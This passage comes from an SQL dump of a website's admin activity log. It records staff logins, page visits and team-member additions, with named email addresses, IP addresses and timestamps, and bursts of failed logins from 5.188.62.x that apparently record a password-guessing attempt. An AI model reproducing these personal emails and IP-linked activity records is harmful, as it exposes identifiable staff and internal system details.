06:53:10',0,'103.101.118.2','1','0'),(217,'Logout Successfully','amit.verma@shardatech.org',1631775227,'2021-09-16 06:53:47',0,'14.139.238.62','1','0'),(218,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1631775236,'2021-09-16 06:53:56',0,'14.139.238.62','1','0'),(219,'Go to home page','amit.verma@shardatech.org',1631775236,'2021-09-16 06:53:56',0,'14.139.238.62','1','0'),(220,'Go to Manage Team','amit.verma@shardatech.org',1631775681,'2021-09-16 07:01:21',0,'103.101.118.2','1','0'),(221,'Go to Manage Menu','Imran@shardatech.org',1631776276,'2021-09-16 07:11:16',0,'103.101.118.2','1','0'),(222,'Go to Manage Menu','Imran@shardatech.org',1631776281,'2021-09-16 07:11:21',0,'103.101.118.2','1','0'),(223,'Go to Manage Menu','Imran@shardatech.org',1631776300,'2021-09-16 07:11:40',0,'103.101.118.2','1','0'),(224,'Go to Manage Menu','Imran@shardatech.org',1631776323,'2021-09-16 07:12:03',0,'103.101.118.2','1','0'),(225,'Go to Manage Menu','Imran@shardatech.org',1631776336,'2021-09-16 07:12:16',0,'14.139.238.62','1','0'),(226,'Go to Manage Menu','Imran@shardatech.org',1631777571,'2021-09-16 07:32:51',0,'103.101.118.2','1','0'),(227,'Go to Manage Menu','Imran@shardatech.org',1631777598,'2021-09-16 07:33:18',0,'14.139.238.62','1','0'),(228,'Go to Manage Menu','Imran@shardatech.org',1631777619,'2021-09-16 07:33:39',0,'103.101.118.2','1','0'),(229,'Go to Manage Menu','Imran@shardatech.org',1631777625,'2021-09-16 07:33:45',0,'14.139.238.62','1','0'),(230,'Go to Manage Menu','Imran@shardatech.org',1631777639,'2021-09-16 07:33:59',0,'14.139.238.62','1','0'),(231,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1631783084,'2021-09-16 09:04:44',0,'103.101.118.2','1','0'),(232,'Go to home page','amit.verma@shardatech.org',1631783084,'2021-09-16 09:04:44',0,'103.101.118.2','1','0'),(233,'Go to Manage Team','amit.verma@shardatech.org',1631783174,'2021-09-16 09:06:14',0,'103.101.118.2','1','0'),(234,'Go to Add/Edit Leadership Member','amit.verma@shardatech.org',1631783180,'2021-09-16 09:06:20',0,'103.101.118.2','1','0'),(235,'Leadership Member Added Successfully','amit.verma@shardatech.org',1631783262,'2021-09-16 09:07:42',0,'14.139.238.62','1','0'),(236,'Go to Manage Team','amit.verma@shardatech.org',1631783262,'2021-09-16 09:07:42',0,'14.139.238.62','1','0'),(237,'Go to Manage Team','amit.verma@shardatech.org',1631783821,'2021-09-16 09:17:01',0,'103.101.118.2','1','0'),(238,'Go to Manage Team','amit.verma@shardatech.org',1631786190,'2021-09-16 09:56:30',0,'14.139.238.62','1','0'),(239,'Go to Add/Edit Leadership Member','amit.verma@shardatech.org',1631786546,'2021-09-16 10:02:26',0,'103.101.118.2','1','0'),(240,'Leadership Member Added Successfully','amit.verma@shardatech.org',1631786564,'2021-09-16 10:02:44',0,'103.101.118.2','1','0'),(241,'Go to Manage Team','amit.verma@shardatech.org',1631786564,'2021-09-16 10:02:44',0,'103.101.118.2','1','0'),(242,'Logout Successfully','amit.verma@shardatech.org',1631786712,'2021-09-16 10:05:12',0,'103.101.118.2','1','0'),(243,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1631786719,'2021-09-16 10:05:19',0,'103.101.118.2','1','0'),(244,'Go to home page','amit.verma@shardatech.org',1631786719,'2021-09-16 10:05:19',0,'103.101.118.2','1','0'),(245,'Go to home page','amit.verma@shardatech.org',1631787358,'2021-09-16 10:15:58',0,'14.139.238.62','1','0'),(246,'Go to home page','Imran@shardatech.org',1631787527,'2021-09-16 10:18:47',0,'103.101.118.2','1','0'),(247,'Go to home page','Imran@shardatech.org',1631787559,'2021-09-16 10:19:19',0,'14.139.238.62','1','0'),(248,'Go to home page','Imran@shardatech.org',1631787562,'2021-09-16 10:19:22',0,'14.139.238.62','1','0'),(249,'Go to home page','amit.verma@shardatech.org',1631787577,'2021-09-16 10:19:37',0,'14.139.238.62','1','0'),(250,'Go to home page','amit.verma@shardatech.org',1631787580,'2021-09-16 10:19:40',0,'14.139.238.62','1','0'),(251,'Go to home page','Imran@shardatech.org',1631787604,'2021-09-16 10:20:04',0,'103.101.118.2','1','0'),(252,'Go to home page','Imran@shardatech.org',1631787628,'2021-09-16 10:20:28',0,'103.101.118.2','1','0'),(253,'Go to Manage Team','Imran@shardatech.org',1631787682,'2021-09-16 10:21:22',0,'103.101.118.2','1','0'),(254,'Go to home page','Imran@shardatech.org',1631787684,'2021-09-16 10:21:24',0,'103.101.118.2','1','0'),(255,'Go to home page','amit.verma@shardatech.org',1631787786,'2021-09-16 10:23:06',0,'14.139.238.62','1','0'),(256,'Go to Manage Team','amit.verma@shardatech.org',1631787809,'2021-09-16 10:23:29',0,'14.139.238.62','1','0'),(257,'Go to home page','amit.verma@shardatech.org',1631787813,'2021-09-16 10:23:33',0,'14.139.238.62','1','0'),(258,'Go to Manage Team','amit.verma@shardatech.org',1631787846,'2021-09-16 10:24:06',0,'14.139.238.62','1','0'),(259,'Go to home page','amit.verma@shardatech.org',1631787856,'2021-09-16 10:24:16',0,'14.139.238.62','1','0'),(260,'Go to home page','amit.verma@shardatech.org',1631787929,'2021-09-16 10:25:29',0,'14.139.238.62','1','0'),(261,'Go to home page','amit.verma@shardatech.org',1631787929,'2021-09-16 10:25:29',0,'14.139.238.62','1','0'),(262,'Go to home page','amit.verma@shardatech.org',1631787996,'2021-09-16 10:26:36',0,'14.139.238.62','1','0'),(263,'Go to home page','amit.verma@shardatech.org',1631788025,'2021-09-16 10:27:05',0,'14.139.238.62','1','0'),(264,'Go to home page','amit.verma@shardatech.org',1631788043,'2021-09-16 10:27:23',0,'103.101.118.2','1','0'),(265,'Go to home page','amit.verma@shardatech.org',1631788086,'2021-09-16 10:28:06',0,'14.139.238.62','1','0'),(266,'Go to home page','amit.verma@shardatech.org',1631788099,'2021-09-16 10:28:19',0,'14.139.238.62','1','0'),(267,'Go to home page','amit.verma@shardatech.org',1631788101,'2021-09-16 10:28:21',0,'103.101.118.2','1','0'),(268,'Go to home page','amit.verma@shardatech.org',1631788155,'2021-09-16 10:29:15',0,'103.101.118.2','1','0'),(269,'Go to home page','amit.verma@shardatech.org',1631788199,'2021-09-16 10:29:59',0,'103.101.118.2','1','0'),(270,'Go to home page','amit.verma@shardatech.org',1631788215,'2021-09-16 10:30:15',0,'103.101.118.2','1','0'),(271,'Go to home page','amit.verma@shardatech.org',1631788232,'2021-09-16 10:30:32',0,'103.101.118.2','1','0'),(272,'Go to Manage Team','amit.verma@shardatech.org',1631788245,'2021-09-16 10:30:45',0,'14.139.238.62','1','0'),(273,'Go to home page','amit.verma@shardatech.org',1631788247,'2021-09-16 10:30:47',0,'14.139.238.62','1','0'),(274,'Go to home page','amit.verma@shardatech.org',1631788250,'2021-09-16 10:30:50',0,'14.139.238.62','1','0'),(275,'Go to home page','amit.verma@shardatech.org',1631788252,'2021-09-16 10:30:52',0,'14.139.238.62','1','0'),(276,'Go to home page','amit.verma@shardatech.org',1631789107,'2021-09-16 10:45:07',0,'103.101.118.2','1','0'),(277,'Go to home page','amit.verma@shardatech.org',1631789280,'2021-09-16 10:48:00',0,'103.101.118.2','1','0'),(278,'Go to home page','amit.verma@shardatech.org',1631789303,'2021-09-16 10:48:23',0,'14.139.238.62','1','0'),(279,'Go to home page','amit.verma@shardatech.org',1631789319,'2021-09-16 10:48:39',0,'14.139.238.62','1','0'),(280,'Go to home page','amit.verma@shardatech.org',1631789343,'2021-09-16 10:49:03',0,'103.101.118.2','1','0'),(281,'Go to Manage Team','amit.verma@shardatech.org',1631789348,'2021-09-16 10:49:08',0,'103.101.118.2','1','0'),(282,'Go to home page','amit.verma@shardatech.org',1631789351,'2021-09-16 10:49:11',0,'103.101.118.2','1','0'),(283,'Go to Manage Team','amit.verma@shardatech.org',1631789352,'2021-09-16 10:49:12',0,'103.101.118.2','1','0'),(284,'Go to home page','amit.verma@shardatech.org',1631789353,'2021-09-16 10:49:13',0,'103.101.118.2','1','0'),(285,'Go to home page','Imran@shardatech.org',1631794040,'2021-09-16 12:07:20',0,'110.235.239.43','1','0'),(286,'Go to home page','Imran@shardatech.org',1631794050,'2021-09-16 12:07:30',0,'110.235.239.43','1','0'),(287,'Go to home page','Imran@shardatech.org',1631794054,'2021-09-16 12:07:34',0,'110.235.239.43','1','0'),(288,'Go to home page','Imran@shardatech.org',1631794057,'2021-09-16 12:07:37',0,'110.235.239.43','1','0'),(289,'Logout Successfully','Imran@shardatech.org',1631794059,'2021-09-16 12:07:39',0,'110.235.239.43','1','0'),(290,'Invalid details. Please try again with valid details',NULL,1689328980,'2023-07-14 10:03:00',0,'3.111.204.219','1','0'),(291,'Invalid details. Please try again with valid details',NULL,1689328986,'2023-07-14 10:03:06',0,'3.111.204.219','1','0'),(292,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1689330312,'2023-07-14 10:25:12',0,'3.111.204.219','1','0'),(293,'Go to home page','amit.verma@shardatech.org',1689330312,'2023-07-14 10:25:12',0,'3.111.204.219','1','0'),(294,'Go to Manage Team','amit.verma@shardatech.org',1689330317,'2023-07-14 10:25:17',0,'3.111.204.219','1','0'),(295,'Go to Manage Menu','amit.verma@shardatech.org',1689330322,'2023-07-14 10:25:22',0,'3.111.204.219','1','0'),(296,'Go to Admin Users','amit.verma@shardatech.org',1689330435,'2023-07-14 10:27:15',0,'3.111.204.219','1','0'),(297,'Go to Add/Edit user info','amit.verma@shardatech.org',1689330438,'2023-07-14 10:27:18',0,'3.111.204.219','1','0'),(298,'User info added successfully','amit.verma@shardatech.org',1689330466,'2023-07-14 10:27:46',0,'3.111.204.219','1','0'),(299,'Go to Admin Users','amit.verma@shardatech.org',1689330466,'2023-07-14 10:27:46',0,'3.111.204.219','1','0'),(300,'Invalid details. Please try again with valid details',NULL,1689330653,'2023-07-14 10:30:53',0,'14.139.238.59','1','0'),(301,'Go to dashboard. Sucessfully login','rehbar@shardatech.org',1689330668,'2023-07-14 10:31:08',0,'103.101.118.4','1','0'),(302,'Go to home page','rehbar@shardatech.org',1689330668,'2023-07-14 10:31:08',0,'103.101.118.4','1','0'),(303,'Go to home page','rehbar@shardatech.org',1689333190,'2023-07-14 11:13:10',0,'14.139.238.59','1','0'),(304,'Go to Manage Menu','amit.verma@shardatech.org',1689335394,'2023-07-14 11:49:54',0,'3.111.204.219','1','0'),(305,'Go to Manage Menu','amit.verma@shardatech.org',1689335398,'2023-07-14 11:49:58',0,'3.111.204.219','1','0'),(306,'Go to Manage Menu','amit.verma@shardatech.org',1689335402,'2023-07-14 11:50:02',0,'3.111.204.219','1','0'),(307,'Go to Manage Team','amit.verma@shardatech.org',1689338278,'2023-07-14 12:37:58',0,'3.111.204.219','1','0'),(308,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338285,'2023-07-14 12:38:05',0,'3.111.204.219','1','0'),(309,'Team Member Added Successfully','amit.verma@shardatech.org',1689338395,'2023-07-14 12:39:55',0,'3.111.204.219','1','0'),(310,'Go to Manage Team','amit.verma@shardatech.org',1689338395,'2023-07-14 12:39:55',0,'3.111.204.219','1','0'),(311,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338414,'2023-07-14 12:40:14',0,'3.111.204.219','1','0'),(312,'Team Member Added Successfully','amit.verma@shardatech.org',1689338458,'2023-07-14 12:40:58',0,'3.111.204.219','1','0'),(313,'Go to Manage Team','amit.verma@shardatech.org',1689338458,'2023-07-14 12:40:58',0,'3.111.204.219','1','0'),(314,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338461,'2023-07-14 12:41:01',0,'3.111.204.219','1','0'),(315,'Team Member Added Successfully','amit.verma@shardatech.org',1689338507,'2023-07-14 12:41:47',0,'3.111.204.219','1','0'),(316,'Go to Manage Team','amit.verma@shardatech.org',1689338507,'2023-07-14 12:41:47',0,'3.111.204.219','1','0'),(317,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338510,'2023-07-14 12:41:50',0,'3.111.204.219','1','0'),(318,'Team Member Added Successfully','amit.verma@shardatech.org',1689338570,'2023-07-14 12:42:50',0,'3.111.204.219','1','0'),(319,'Go to Manage Team','amit.verma@shardatech.org',1689338570,'2023-07-14 12:42:50',0,'3.111.204.219','1','0'),(320,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338573,'2023-07-14 12:42:53',0,'3.111.204.219','1','0'),(321,'Team Member Added Successfully','amit.verma@shardatech.org',1689338596,'2023-07-14 12:43:16',0,'3.111.204.219','1','0'),(322,'Go to Manage Team','amit.verma@shardatech.org',1689338596,'2023-07-14 12:43:16',0,'3.111.204.219','1','0'),(323,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338671,'2023-07-14 12:44:31',0,'3.111.204.219','1','0'),(324,'Team Member Added Successfully','amit.verma@shardatech.org',1689338677,'2023-07-14 12:44:37',0,'3.111.204.219','1','0'),(325,'Go to Manage Team','amit.verma@shardatech.org',1689338677,'2023-07-14 12:44:37',0,'3.111.204.219','1','0'),(326,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338764,'2023-07-14 12:46:04',0,'3.111.204.219','1','0'),(327,'Team Member Added Successfully','amit.verma@shardatech.org',1689338808,'2023-07-14 12:46:48',0,'3.111.204.219','1','0'),(328,'Go to Manage Team','amit.verma@shardatech.org',1689338808,'2023-07-14 12:46:48',0,'3.111.204.219','1','0'),(329,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338878,'2023-07-14 12:47:58',0,'3.111.204.219','1','0'),(330,'Team Member Added Successfully','amit.verma@shardatech.org',1689338893,'2023-07-14 12:48:13',0,'3.111.204.219','1','0'),(331,'Go to Manage Team','amit.verma@shardatech.org',1689338893,'2023-07-14 12:48:13',0,'3.111.204.219','1','0'),(332,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338895,'2023-07-14 12:48:15',0,'3.111.204.219','1','0'),(333,'Team Member Added Successfully','amit.verma@shardatech.org',1689338955,'2023-07-14 12:49:15',0,'3.111.204.219','1','0'),(334,'Go to Manage Team','amit.verma@shardatech.org',1689338955,'2023-07-14 12:49:15',0,'3.111.204.219','1','0'),(335,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689338965,'2023-07-14 12:49:25',0,'3.111.204.219','1','0'),(336,'Team Member Added Successfully','amit.verma@shardatech.org',1689338978,'2023-07-14 12:49:38',0,'3.111.204.219','1','0'),(337,'Go to Manage Team','amit.verma@shardatech.org',1689338978,'2023-07-14 12:49:38',0,'3.111.204.219','1','0'),(338,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339030,'2023-07-14 12:50:30',0,'3.111.204.219','1','0'),(339,'Go to Manage Team','amit.verma@shardatech.org',1689339090,'2023-07-14 12:51:30',0,'3.111.204.219','1','0'),(340,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339100,'2023-07-14 12:51:40',0,'3.111.204.219','1','0'),(341,'Go to Manage Team','amit.verma@shardatech.org',1689339199,'2023-07-14 12:53:19',0,'3.111.204.219','1','0'),(342,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339202,'2023-07-14 12:53:22',0,'3.111.204.219','1','0'),(343,'Team Member Added Successfully','amit.verma@shardatech.org',1689339259,'2023-07-14 12:54:19',0,'3.111.204.219','1','0'),(344,'Go to Manage Team','amit.verma@shardatech.org',1689339259,'2023-07-14 12:54:19',0,'3.111.204.219','1','0'),(345,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339263,'2023-07-14 12:54:23',0,'3.111.204.219','1','0'),(346,'Team Member Added Successfully','amit.verma@shardatech.org',1689339317,'2023-07-14 12:55:17',0,'3.111.204.219','1','0'),(347,'Go to Manage Team','amit.verma@shardatech.org',1689339317,'2023-07-14 12:55:17',0,'3.111.204.219','1','0'),(348,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339321,'2023-07-14 12:55:21',0,'3.111.204.219','1','0'),(349,'Team Member Added Successfully','amit.verma@shardatech.org',1689339365,'2023-07-14 12:56:05',0,'3.111.204.219','1','0'),(350,'Go to Manage Team','amit.verma@shardatech.org',1689339365,'2023-07-14 12:56:05',0,'3.111.204.219','1','0'),(351,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689339368,'2023-07-14 12:56:08',0,'3.111.204.219','1','0'),(352,'Team Member Added Successfully','amit.verma@shardatech.org',1689339408,'2023-07-14 12:56:48',0,'3.111.204.219','1','0'),(353,'Go to Manage Team','amit.verma@shardatech.org',1689339408,'2023-07-14 12:56:48',0,'3.111.204.219','1','0'),(354,'Go to Manage Menu','amit.verma@shardatech.org',1689339548,'2023-07-14 12:59:08',0,'3.111.204.219','1','0'),(355,'Go to Manage Menu','amit.verma@shardatech.org',1689339552,'2023-07-14 12:59:12',0,'3.111.204.219','1','0'),(356,'Go to Manage Menu','amit.verma@shardatech.org',1689339558,'2023-07-14 12:59:18',0,'3.111.204.219','1','0'),(357,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1689340440,'2023-07-14 13:14:00',0,'3.111.204.219','1','0'),(358,'Go to home page','amit.verma@shardatech.org',1689340440,'2023-07-14 13:14:00',0,'3.111.204.219','1','0'),(359,'Go to Manage Team','amit.verma@shardatech.org',1689340446,'2023-07-14 13:14:06',0,'3.111.204.219','1','0'),(360,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689340456,'2023-07-14 13:14:16',0,'3.111.204.219','1','0'),(361,'Team Member Added Successfully','amit.verma@shardatech.org',1689340466,'2023-07-14 13:14:26',0,'3.111.204.219','1','0'),(362,'Go to Manage Team','amit.verma@shardatech.org',1689340466,'2023-07-14 13:14:26',0,'3.111.204.219','1','0'),(363,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689340474,'2023-07-14 13:14:34',0,'3.111.204.219','1','0'),(364,'Team Member Added Successfully','amit.verma@shardatech.org',1689340485,'2023-07-14 13:14:45',0,'3.111.204.219','1','0'),(365,'Go to Manage Team','amit.verma@shardatech.org',1689340485,'2023-07-14 13:14:45',0,'3.111.204.219','1','0'),(366,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689340492,'2023-07-14 13:14:52',0,'3.111.204.219','1','0'),(367,'Team Member Added Successfully','amit.verma@shardatech.org',1689340500,'2023-07-14 13:15:00',0,'3.111.204.219','1','0'),(368,'Go to Manage Team','amit.verma@shardatech.org',1689340500,'2023-07-14 13:15:00',0,'3.111.204.219','1','0'),(369,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689340503,'2023-07-14 13:15:03',0,'3.111.204.219','1','0'),(370,'Team Member Added Successfully','amit.verma@shardatech.org',1689340512,'2023-07-14 13:15:12',0,'3.111.204.219','1','0'),(371,'Go to Manage Team','amit.verma@shardatech.org',1689340512,'2023-07-14 13:15:12',0,'3.111.204.219','1','0'),(372,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689340515,'2023-07-14 13:15:15',0,'3.111.204.219','1','0'),(373,'Team Member Added Successfully','amit.verma@shardatech.org',1689340522,'2023-07-14 13:15:22',0,'3.111.204.219','1','0'),(374,'Go to Manage Team','amit.verma@shardatech.org',1689340522,'2023-07-14 13:15:22',0,'3.111.204.219','1','0'),(375,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1689344530,'2023-07-14 14:22:10',0,'3.111.204.219','1','0'),(376,'Go to home page','amit.verma@shardatech.org',1689344530,'2023-07-14 14:22:10',0,'3.111.204.219','1','0'),(377,'Go to Manage Team','amit.verma@shardatech.org',1689344542,'2023-07-14 14:22:22',0,'3.111.204.219','1','0'),(378,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689344622,'2023-07-14 14:23:42',0,'3.111.204.219','1','0'),(379,'Team Member Added Successfully','amit.verma@shardatech.org',1689345031,'2023-07-14 14:30:31',0,'3.111.204.219','1','0'),(380,'Go to Manage Team','amit.verma@shardatech.org',1689345031,'2023-07-14 14:30:31',0,'3.111.204.219','1','0'),(381,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689345428,'2023-07-14 14:37:08',0,'3.111.204.219','1','0'),(382,'Team Member Added Successfully','amit.verma@shardatech.org',1689345928,'2023-07-14 14:45:28',0,'3.111.204.219','1','0'),(383,'Go to Manage Team','amit.verma@shardatech.org',1689345945,'2023-07-14 14:45:45',0,'3.111.204.219','1','0'),(384,'Go to home page','amit.verma@shardatech.org',1689348197,'2023-07-14 15:23:17',0,'3.111.204.219','1','0'),(385,'Go to Manage Menu','amit.verma@shardatech.org',1689351185,'2023-07-14 16:13:05',0,'3.111.204.219','1','0'),(386,'Logout Successfully','amit.verma@shardatech.org',1689351695,'2023-07-14 16:21:35',0,'3.111.204.219','1','0'),(387,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1689402116,'2023-07-15 06:21:56',0,'103.101.118.4','1','0'),(388,'Go to home page','amit.verma@shardatech.org',1689402116,'2023-07-15 06:21:56',0,'14.139.238.59','1','0'),(389,'Go to Manage Team','amit.verma@shardatech.org',1689402936,'2023-07-15 06:35:36',0,'3.111.204.219','1','0'),(390,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689402937,'2023-07-15 06:35:37',0,'3.111.204.219','1','0'),(391,'Team Member Added Successfully','amit.verma@shardatech.org',1689402991,'2023-07-15 06:36:31',0,'3.111.204.219','1','0'),(392,'Go to Manage Team','amit.verma@shardatech.org',1689402991,'2023-07-15 06:36:31',0,'3.111.204.219','1','0'),(393,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1689402996,'2023-07-15 06:36:36',0,'3.111.204.219','1','0'),(394,'Team Member Added Successfully','amit.verma@shardatech.org',1689403029,'2023-07-15 06:37:09',0,'3.111.204.219','1','0'),(395,'Go to Manage Team','amit.verma@shardatech.org',1689403029,'2023-07-15 06:37:09',0,'3.111.204.219','1','0'),(396,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1689766814,'2023-07-19 11:40:14',0,'3.111.204.219','1','0'),(397,'Go to home page','amit.verma@shardatech.org',1689766814,'2023-07-19 11:40:14',0,'3.111.204.219','1','0'),(398,'Invalid details. Please try again with valid details',NULL,1690733546,'2023-07-30 16:12:26',0,'5.188.62.76','1','0'),(399,'Invalid details. Please try again with valid details',NULL,1690733548,'2023-07-30 16:12:28',0,'5.188.62.76','1','0'),(400,'Invalid details. Please try again with valid details',NULL,1690733551,'2023-07-30 16:12:31',0,'5.188.62.76','1','0'),(401,'Invalid details. Please try again with valid details',NULL,1690733551,'2023-07-30 16:12:31',0,'5.188.62.76','1','0'),(402,'Invalid details. Please try again with valid details',NULL,1690733553,'2023-07-30 16:12:33',0,'5.188.62.76','1','0'),(403,'Invalid details. Please try again with valid details',NULL,1690733555,'2023-07-30 16:12:35',0,'5.188.62.76','1','0'),(404,'Invalid details. Please try again with valid details',NULL,1690733559,'2023-07-30 16:12:39',0,'5.188.62.76','1','0'),(405,'Invalid details. Please try again with valid details',NULL,1690733564,'2023-07-30 16:12:44',0,'5.188.62.76','1','0'),(406,'Invalid details. Please try again with valid details',NULL,1690733567,'2023-07-30 16:12:47',0,'5.188.62.76','1','0'),(407,'Invalid details. Please try again with valid details',NULL,1690733571,'2023-07-30 16:12:51',0,'5.188.62.76','1','0'),(408,'Invalid details. Please try again with valid details',NULL,1690733572,'2023-07-30 16:12:52',0,'5.188.62.76','1','0'),(409,'Invalid details. Please try again with valid details',NULL,1690733576,'2023-07-30 16:12:56',0,'5.188.62.76','1','0'),(410,'Invalid details. Please try again with valid details',NULL,1690733577,'2023-07-30 16:12:57',0,'5.188.62.76','1','0'),(411,'Invalid details. Please try again with valid details',NULL,1690733582,'2023-07-30 16:13:02',0,'5.188.62.76','1','0'),(412,'Invalid details. Please try again with valid details',NULL,1690733584,'2023-07-30 16:13:04',0,'5.188.62.76','1','0'),(413,'Invalid details. Please try again with valid details',NULL,1690733589,'2023-07-30 16:13:09',0,'5.188.62.76','1','0'),(414,'Invalid details. Please try again with valid details',NULL,1690733591,'2023-07-30 16:13:11',0,'5.188.62.76','1','0'),(415,'Invalid details. Please try again with valid details',NULL,1690733596,'2023-07-30 16:13:16',0,'5.188.62.76','1','0'),(416,'Invalid details. Please try again with valid details',NULL,1690733596,'2023-07-30 16:13:16',0,'5.188.62.76','1','0'),(417,'Invalid details. Please try again with valid details',NULL,1690733601,'2023-07-30 16:13:21',0,'5.188.62.76','1','0'),(418,'Invalid details. Please try again with valid details',NULL,1690733603,'2023-07-30 16:13:23',0,'5.188.62.76','1','0'),(419,'Invalid details. Please try again with valid details',NULL,1690733607,'2023-07-30 16:13:27',0,'5.188.62.76','1','0'),(420,'Invalid details. Please try again with valid details',NULL,1690733609,'2023-07-30 16:13:29',0,'5.188.62.76','1','0'),(421,'Invalid details. Please try again with valid details',NULL,1690733614,'2023-07-30 16:13:34',0,'5.188.62.76','1','0'),(422,'Invalid details. Please try again with valid details',NULL,1690733615,'2023-07-30 16:13:35',0,'5.188.62.76','1','0'),(423,'Invalid details. Please try again with valid details',NULL,1690733619,'2023-07-30 16:13:39',0,'5.188.62.76','1','0'),(424,'Invalid details. Please try again with valid details',NULL,1690733621,'2023-07-30 16:13:41',0,'5.188.62.76','1','0'),(425,'Invalid details. Please try again with valid details',NULL,1690733626,'2023-07-30 16:13:46',0,'5.188.62.76','1','0'),(426,'Invalid details. Please try again with valid details',NULL,1690733627,'2023-07-30 16:13:47',0,'5.188.62.76','1','0'),(427,'Invalid details. Please try again with valid details',NULL,1690733632,'2023-07-30 16:13:52',0,'5.188.62.76','1','0'),(428,'Invalid details. Please try again with valid details',NULL,1690733633,'2023-07-30 16:13:53',0,'5.188.62.76','1','0'),(429,'Invalid details. Please try again with valid details',NULL,1690733638,'2023-07-30 16:13:58',0,'5.188.62.76','1','0'),(430,'Invalid details. Please try again with valid details',NULL,1690733639,'2023-07-30 16:13:59',0,'5.188.62.76','1','0'),(431,'Invalid details. Please try again with valid details',NULL,1690733644,'2023-07-30 16:14:04',0,'5.188.62.76','1','0'),(432,'Invalid details. Please try again with valid details',NULL,1690734088,'2023-07-30 16:21:28',0,'5.188.62.21','1','0'),(433,'Invalid details. Please try again with valid details',NULL,1690743253,'2023-07-30 18:54:13',0,'5.188.62.26','1','0'),(434,'Invalid details. Please try again with valid details',NULL,1690743256,'2023-07-30 18:54:16',0,'5.188.62.26','1','0'),(435,'Invalid details. Please try again with valid details',NULL,1690743257,'2023-07-30 18:54:17',0,'5.188.62.26','1','0'),(436,'Invalid details. Please try again with valid details',NULL,1690743258,'2023-07-30 18:54:18',0,'5.188.62.26','1','0'),(437,'Invalid details. Please try again with valid details',NULL,1690743261,'2023-07-30 18:54:21',0,'5.188.62.26','1','0'),(438,'Invalid details. Please try again with valid details',NULL,1690743262,'2023-07-30 18:54:22',0,'5.188.62.26','1','0'),(439,'Invalid details. Please try again with valid details',NULL,1690743266,'2023-07-30 18:54:26',0,'5.188.62.26','1','0'),(440,'Invalid details. Please try again with valid details',NULL,1690743271,'2023-07-30 18:54:31',0,'5.188.62.26','1','0'),(441,'Invalid details. Please try again with valid details',NULL,1690743274,'2023-07-30 18:54:34',0,'5.188.62.26','1','0'),(442,'Invalid details. Please try again with valid details',NULL,1690743279,'2023-07-30 18:54:39',0,'5.188.62.26','1','0'),(443,'Invalid details. Please try again with valid details',NULL,1690743280,'2023-07-30 18:54:40',0,'5.188.62.26','1','0'),(444,'Invalid details. Please try again with valid details',NULL,1690743284,'2023-07-30 18:54:44',0,'5.188.62.26','1','0'),(445,'Invalid details. Please try again with valid details',NULL,1690743285,'2023-07-30 18:54:45',0,'5.188.62.26','1','0'),(446,'Invalid details. Please try again with valid details',NULL,1690743288,'2023-07-30 18:54:48',0,'5.188.62.26','1','0'),(447,'Invalid details. Please try again with valid details',NULL,1690743291,'2023-07-30 18:54:51',0,'5.188.62.26','1','0'),(448,'Invalid details. Please try again with valid details',NULL,1690743297,'2023-07-30 18:54:57',0,'5.188.62.26','1','0'),(449,'Invalid details. Please try again with valid details',NULL,1690743298,'2023-07-30 18:54:58',0,'5.188.62.26','1','0'),(450,'Invalid details. Please try again with valid details',NULL,1690743303,'2023-07-30 18:55:03',0,'5.188.62.26','1','0'),(451,'Invalid details. Please try again with valid details',NULL,1690743303,'2023-07-30 18:55:03',0,'5.188.62.26','1','0'),(452,'Invalid details. Please try again with valid details',NULL,1690743308,'2023-07-30 18:55:08',0,'5.188.62.26','1','0'),(453,'Invalid details. Please try again with valid details',NULL,1690743310,'2023-07-30 18:55:10',0,'5.188.62.26','1','0'),(454,'Invalid details. Please try again with valid details',NULL,1690743315,'2023-07-30 18:55:15',0,'5.188.62.26','1','0'),(455,'Invalid details. Please try again with valid details',NULL,1690743316,'2023-07-30 18:55:16',0,'5.188.62.26','1','0'),(456,'Invalid details. Please try again with valid details',NULL,1690743321,'2023-07-30 18:55:21',0,'5.188.62.26','1','0'),(457,'Invalid details. Please try again with valid details',NULL,1690743322,'2023-07-30 18:55:22',0,'5.188.62.26','1','0'),(458,'Invalid details. Please try again with valid details',NULL,1690743327,'2023-07-30 18:55:27',0,'5.188.62.26','1','0'),(459,'Invalid details. Please try again with valid details',NULL,1690743328,'2023-07-30 18:55:28',0,'5.188.62.26','1','0'),(460,'Invalid details. Please try again with valid details',NULL,1690743333,'2023-07-30 18:55:33',0,'5.188.62.26','1','0'),(461,'Invalid details. Please try again with valid details',NULL,1690743335,'2023-07-30 18:55:35',0,'5.188.62.26','1','0'),(462,'Invalid details. Please try again with valid details',NULL,1690743339,'2023-07-30 18:55:39',0,'5.188.62.26','1','0'),(463,'Invalid details. Please try again with valid details',NULL,1690743341,'2023-07-30 18:55:41',0,'5.188.62.26','1','0'),(464,'Invalid details. Please try again with valid details',NULL,1690743347,'2023-07-30 